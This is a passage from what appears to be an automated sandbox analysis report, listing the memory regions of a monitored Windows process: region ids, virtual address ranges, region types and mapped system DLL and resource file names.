"\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 2666 start_va = 0x27b0000 end_va = 0x27b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tabletextservice.dll.mui" filename = "\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" (normalized: "c:\\program files\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui") Region: id = 2669 start_va = 0x2750000 end_va = 0x27abfff monitored = 0 entry_point = 0x277bbbc region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 2670 start_va = 0x27b0000 end_va = 0x27b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tabletextservice.dll.mui" filename = "\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" (normalized: "c:\\program files\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui") Region: id = 2671 start_va = 0x2750000 end_va = 0x27abfff monitored = 0 entry_point = 0x277bbbc region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 2672 start_va = 0x27b0000 end_va = 0x27b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tabletextservice.dll.mui" filename = "\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" (normalized: "c:\\program files\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui") Region: id = 2673 start_va = 0x2750000 end_va = 0x27abfff monitored = 0 entry_point = 0x277bbbc region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 2674 start_va = 0x27b0000 end_va = 0x27b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tabletextservice.dll.mui" filename = "\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" (normalized: "c:\\program files\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui") Region: id = 2675 start_va = 0x2750000 end_va = 0x27abfff monitored = 0 entry_point = 0x277bbbc region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 2676 start_va = 0x27b0000 end_va = 0x27b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tabletextservice.dll.mui" filename = "\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" (normalized: "c:\\program files\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui") Region: id = 2677 start_va = 0x2750000 end_va = 0x27abfff monitored = 0 entry_point = 0x277bbbc region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 2678 start_va = 0x27b0000 end_va = 0x27b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tabletextservice.dll.mui" filename = "\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" (normalized: "c:\\program files\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui") Region: id = 2679 start_va = 0x2750000 end_va = 0x27abfff monitored = 0 entry_point = 0x277bbbc region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 2680 start_va = 0x27b0000 end_va = 0x27b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tabletextservice.dll.mui" filename = "\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" (normalized: "c:\\program files\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui") Region: id = 2681 start_va = 0x2750000 end_va = 0x27cafff monitored = 0 entry_point = 0x27a385c region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 2682 start_va = 0x2750000 end_va = 0x278cfff monitored = 0 entry_point = 0x2751070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 2683 start_va = 0x2790000 end_va = 0x2795fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 2684 start_va = 0x2750000 end_va = 0x280ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2685 start_va = 0x2890000 end_va = 0x2891fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002890000" filename = "" Region: id = 2686 start_va = 0x7fefd990000 end_va = 0x7fefd9cafff monitored = 0 entry_point = 0x7fefd991324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2693 start_va = 0x2c40000 end_va = 0x2e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c40000" filename = "" Region: id = 2698 start_va = 0x3700000 end_va = 0x402ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 2733 start_va = 0x2890000 end_va = 0x2890fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 2995 start_va = 0x28a0000 end_va = 0x28a5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028a0000" filename = "" Region: id = 2996 start_va = 0x28b0000 end_va = 0x28b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 2997 start_va = 0x28c0000 end_va = 0x28c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028c0000" filename = "" Region: id = 2998 start_va = 0x2c40000 end_va = 0x2d1efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c40000" filename = "" Region: id = 2999 start_va = 0x2dd0000 end_va = 0x2e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002dd0000" filename = "" Region: id = 3000 start_va = 0x2c40000 end_va = 0x2d1efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c40000" filename = "" Region: id = 3001 start_va = 0x28e0000 end_va = 0x28e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 3002 start_va = 0x28f0000 end_va = 0x28f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 3003 start_va = 0x2900000 end_va = 0x2900fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 3004 start_va = 0x2910000 end_va = 0x2910fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 3005 start_va = 0x29a0000 end_va = 0x29a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 3006 start_va = 0x29b0000 end_va = 0x29b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 3007 start_va = 0x2a40000 end_va = 0x2a40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 3008 start_va = 0x2a50000 end_va = 0x2a50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a50000" filename = "" Region: id = 3009 start_va = 0x2a60000 end_va = 0x2a60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a60000" filename = "" Region: id = 3010 start_va = 0x2a70000 end_va = 0x2a70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 3011 start_va = 0x2a80000 end_va = 0x2a80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a80000" filename = "" Region: id = 3012 start_va = 0x2a90000 end_va = 0x2a90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 3013 start_va = 0x2aa0000 end_va = 0x2aa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002aa0000" filename = "" Region: id = 3014 start_va = 0x2ab0000 end_va = 0x2ab0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ab0000" filename = "" Region: id = 3015 start_va = 0x2ac0000 end_va = 0x2ac0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ac0000" filename = "" Region: id = 3016 start_va = 0x2ad0000 end_va = 0x2ad0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 3017 start_va = 0x2ae0000 end_va = 0x2ae0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ae0000" filename = "" Region: id = 3018 start_va = 0x2af0000 end_va = 0x2af0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002af0000" filename = "" Region: id = 3019 start_va = 0x2b00000 end_va = 0x2b00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 3020 start_va = 0x2b90000 end_va = 0x2b90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b90000" filename = "" Region: id = 3021 start_va = 0x2ba0000 end_va = 0x2ba0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 3022 start_va = 0x2bb0000 end_va = 0x2bb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 3023 start_va = 0x2d20000 end_va = 0x2d20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d20000" filename = "" Region: id = 3024 start_va = 0x2d30000 end_va = 0x2d30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d30000" filename = "" Region: id = 3025 start_va = 0x2d40000 end_va = 0x2d40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d40000" filename = "" Region: id = 3026 start_va = 0x2d50000 end_va = 0x2d50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d50000" filename = "" Region: id = 3027 start_va = 0x2d60000 end_va = 0x2d60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d60000" filename = "" Region: id = 3028 start_va = 0x2d70000 end_va = 0x2d70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d70000" filename = "" Region: id = 3029 start_va = 0x2d80000 end_va = 0x2d80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d80000" filename = "" Region: id = 3030 start_va = 0x2d90000 end_va = 0x2d90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d90000" filename = "" Region: id = 3031 start_va = 0x2da0000 end_va = 0x2da0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002da0000" filename = "" Region: id = 3032 start_va = 0x2db0000 end_va = 0x2db0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002db0000" filename = "" Region: id = 3033 start_va = 0x2dc0000 end_va = 0x2dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002dc0000" filename = "" Region: id = 3034 start_va = 0x2e50000 end_va = 0x2e50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e50000" filename = "" Region: id = 3035 start_va = 0x2e60000 end_va = 0x2e60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e60000" filename = "" Region: id = 3036 start_va = 0x2e70000 end_va = 0x2e70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e70000" filename = "" Region: id = 3037 start_va = 0x2e80000 end_va = 0x2e86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e80000" filename = "" Region: id = 3038 start_va = 0x2e90000 end_va = 0x2e99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 3039 start_va = 0x2ea0000 end_va = 0x2ea6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 3040 start_va = 0x2eb0000 end_va = 0x2ed3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002eb0000" filename = "" Region: id = 3041 start_va = 0x2ee0000 end_va = 0x2ee9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ee0000" filename = "" Region: id = 3042 start_va = 0x2ef0000 end_va = 0x2ef6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ef0000" filename = "" Region: id = 3043 start_va = 0x2f00000 end_va = 0x2f09fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 3044 start_va = 0x2f10000 end_va = 0x2f16fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f10000" filename = "" Region: id = 3045 start_va = 0x2f20000 end_va = 0x2f57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f20000" filename = "" Region: id = 3046 start_va = 0x2f60000 end_va = 0x2f69fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 3047 start_va = 0x2f70000 end_va = 0x2f70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f70000" filename = "" Region: id = 3048 start_va = 0x2f80000 end_va = 0x2f80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f80000" filename = "" Region: id = 3049 start_va = 0x2f90000 end_va = 0x2f90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f90000" filename = "" Region: id = 3050 start_va = 0x2fa0000 end_va = 0x2fa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fa0000" filename = "" Region: id = 3051 start_va = 0x2fb0000 end_va = 0x2fb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fb0000" filename = "" Region: id = 3052 start_va = 0x2fc0000 end_va = 0x2fc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fc0000" filename = "" Region: id = 3053 start_va = 0x2fd0000 end_va = 0x2fd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fd0000" filename = "" Region: id = 3054 start_va = 0x2fe0000 end_va = 0x2fe1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fe0000" filename = "" Region: id = 3055 start_va = 0x2ff0000 end_va = 0x2ff0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ff0000" filename = "" Region: id = 3056 start_va = 0x3000000 end_va = 0x3001fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 3057 start_va = 0x3010000 end_va = 0x3010fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 3058 start_va = 0x3020000 end_va = 0x3021fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003020000" filename = "" Region: id = 3059 start_va = 0x3030000 end_va = 0x3030fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 3060 start_va = 0x3040000 end_va = 0x3040fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 3061 start_va = 0x3050000 end_va = 0x3050fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003050000" filename = "" Region: id = 3062 start_va = 0x3060000 end_va = 0x3060fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003060000" filename = "" Region: id = 3063 start_va = 0x3070000 end_va = 0x3070fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003070000" filename = "" Region: id = 3064 start_va = 0x3080000 end_va = 0x3080fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003080000" filename = "" Region: id = 3065 start_va = 0x3090000 end_va = 0x3090fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 3066 start_va = 0x30a0000 end_va = 0x30a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 3067 start_va = 0x30b0000 end_va = 0x30b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030b0000" filename = "" Region: id = 3068 start_va = 0x30c0000 end_va = 0x30c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030c0000" filename = "" Region: id = 3069 start_va = 0x30d0000 end_va = 0x30d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030d0000" filename = "" Region: id = 3070 start_va = 0x30e0000 end_va = 0x30e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030e0000" filename = "" Region: id = 3071 start_va = 0x4030000 end_va = 0x4030fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004030000" filename = "" Region: id = 3072 start_va = 0x4040000 end_va = 0x4040fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004040000" filename = "" Region: id = 3073 start_va = 0x4050000 end_va = 0x4050fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004050000" filename = "" Region: id = 3074 start_va = 0x4060000 end_va = 0x4060fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004060000" filename = "" Region: id = 3075 start_va = 0x4070000 end_va = 0x4070fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 3076 start_va = 0x4080000 end_va = 0x4080fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 3077 start_va = 0x4090000 end_va = 0x428ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 3078 start_va = 0x30e0000 end_va = 0x30e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030e0000" filename = "" Region: id = 3079 start_va = 0x4030000 end_va = 0x4030fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004030000" filename = "" Region: id = 3080 start_va = 0x4040000 end_va = 0x4040fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004040000" filename = "" Region: id = 3081 start_va = 0x4050000 end_va = 0x4050fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004050000" filename = "" Region: id = 3082 start_va = 0x4060000 end_va = 0x4060fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004060000" filename = "" Region: id = 3083 start_va = 0x4070000 end_va = 0x4070fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 3084 start_va = 0x4080000 end_va = 0x4080fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 3085 start_va = 0x4290000 end_va = 0x4290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004290000" filename = "" Region: id = 3086 start_va = 0x42a0000 end_va = 0x42a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042a0000" filename = "" Region: id = 3087 start_va = 0x42b0000 end_va = 0x42b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042b0000" filename = "" Region: id = 3088 start_va = 0x42c0000 end_va = 0x42c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042c0000" filename = "" Region: id = 3089 start_va = 0x42d0000 end_va = 0x42d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042d0000" filename = "" Region: id = 3090 start_va = 0x42e0000 end_va = 0x42e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 3091 start_va = 0x42f0000 end_va = 0x42f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042f0000" filename = "" Region: id = 3092 start_va = 0x4300000 end_va = 0x4300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 3093 start_va = 0x4310000 end_va = 0x4310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004310000" filename = "" Region: id = 3094 start_va = 0x4320000 end_va = 0x4320fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 3095 start_va = 0x4330000 end_va = 0x4330fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004330000" filename = "" Region: id = 3096 start_va = 0x4340000 end_va = 0x4340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004340000" filename = "" Region: id = 3097 start_va = 0x4350000 end_va = 0x4350fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 3098 start_va = 0x4360000 end_va = 0x4360fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004360000" filename = "" Region: id = 3099 start_va = 0x4370000 end_va = 0x4370fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 3100 start_va = 0x4380000 end_va = 0x4380fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004380000" filename = "" Region: id = 3101 start_va = 0x4390000 end_va = 0x4390fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004390000" filename = "" Region: id = 3102 start_va = 0x43a0000 end_va = 0x43a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043a0000" filename = "" Region: id = 3103 start_va = 0x43b0000 end_va = 0x43b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043b0000" filename = "" Region: id = 3104 start_va = 0x43c0000 end_va = 0x43c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043c0000" filename = "" Region: id = 3105 start_va = 0x43d0000 end_va = 0x43d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043d0000" filename = "" Region: id = 3106 start_va = 0x43e0000 end_va = 0x43e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043e0000" filename = "" Region: id = 3107 start_va = 0x43f0000 end_va = 0x43f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043f0000" filename = "" Region: id = 3108 start_va = 0x4400000 end_va = 0x4400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 3109 start_va = 0x4410000 end_va = 0x4410fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 3110 start_va = 0x4420000 end_va = 0x4420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004420000" filename = "" Region: id = 3111 start_va = 0x4430000 end_va = 0x4430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 3112 start_va = 0x4440000 end_va = 0x4440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 3113 start_va = 0x4450000 end_va = 0x4450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004450000" filename = "" Region: id = 3114 start_va = 0x4460000 end_va = 0x4466fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 3115 start_va = 0x4470000 end_va = 0x4479fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004470000" filename = "" Region: id = 3116 start_va = 0x4480000 end_va = 0x4486fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 3117 start_va = 0x4490000 end_va = 0x44b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 3118 start_va = 0x44c0000 end_va = 0x44c9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 3119 start_va = 0x44d0000 end_va = 0x44d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044d0000" filename = "" Region: id = 3120 start_va = 0x44e0000 end_va = 0x44e9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 3121 start_va = 0x44f0000 end_va = 0x44f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 3122 start_va = 0x4500000 end_va = 0x4537fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 3123 start_va = 0x4540000 end_va = 0x4549fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 3124 start_va = 0x4550000 end_va = 0x4550fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004550000" filename = "" Region: id = 3125 start_va = 0x4560000 end_va = 0x4560fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 3126 start_va = 0x4570000 end_va = 0x4570fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 3127 start_va = 0x4580000 end_va = 0x4580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004580000" filename = "" Region: id = 3128 start_va = 0x4590000 end_va = 0x4590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 3129 start_va = 0x45a0000 end_va = 0x45a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 3130 start_va = 0x45b0000 end_va = 0x45b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045b0000" filename = "" Region: id = 3131 start_va = 0x45c0000 end_va = 0x45c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045c0000" filename = "" Region: id = 3132 start_va = 0x45d0000 end_va = 0x45d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045d0000" filename = "" Region: id = 3133 start_va = 0x45e0000 end_va = 0x45e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045e0000" filename = "" Region: id = 3134 start_va = 0x45f0000 end_va = 0x45f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045f0000" filename = "" Region: id = 3135 start_va = 0x4600000 end_va = 0x4601fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 3136 start_va = 0x4610000 end_va = 0x4610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004610000" filename = "" Region: id = 3137 start_va = 0x4620000 end_va = 0x4620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 3138 start_va = 0x4630000 end_va = 0x4630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 3139 start_va = 0x4640000 end_va = 0x4640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004640000" filename = "" Region: id = 3140 start_va = 0x4650000 end_va = 0x4650fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004650000" filename = "" Region: id = 3141 start_va = 0x4660000 end_va = 0x4660fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004660000" filename = "" Region: id = 3142 start_va = 0x4670000 end_va = 0x4670fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004670000" filename = "" Region: id = 3143 start_va = 0x4680000 end_va = 0x4680fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 3144 start_va = 0x4690000 end_va = 0x4690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004690000" filename = "" Region: id = 3145 start_va = 0x46a0000 end_va = 0x46a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 3146 start_va = 0x46b0000 end_va = 0x46b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046b0000" filename = "" Region: id = 3147 start_va = 0x46c0000 end_va = 0x46c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 3148 start_va = 0x46d0000 end_va = 0x46d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046d0000" filename = "" Region: id = 3149 start_va = 0x46e0000 end_va = 0x46e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046e0000" filename = "" Region: id = 3150 start_va = 0x46f0000 end_va = 0x46f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046f0000" filename = "" Region: id = 3151 start_va = 0x4700000 end_va = 0x4700fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 3152 start_va = 0x4710000 end_va = 0x4710fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004710000" filename = "" Region: id = 3153 start_va = 0x4720000 end_va = 0x4720fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004720000" filename = "" Region: id = 3157 start_va = 0x28d0000 end_va = 0x28d0fff 